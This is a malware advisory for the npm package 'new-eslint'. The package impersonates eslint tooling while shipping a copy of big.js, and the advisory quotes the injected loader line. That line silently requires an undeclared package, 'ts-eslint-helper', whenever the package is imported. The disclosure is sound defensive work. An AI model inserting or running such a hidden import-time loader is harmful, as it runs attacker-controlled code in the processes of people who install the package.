MAL-2026-6224
Malicious code in new-eslint (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25)

Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: `const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package `ts-eslint-helper` is not declared in package.json — the manifest lists a different package, `eslint-helper@4.0.1` — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever `ts-eslint-helper.from_str()` does runs in the installer's process on import with no advertised functionality justifying it.
Affected packages
No fixed version published yet for new-eslint (npm). Pin to a known-safe version or switch to an alternative.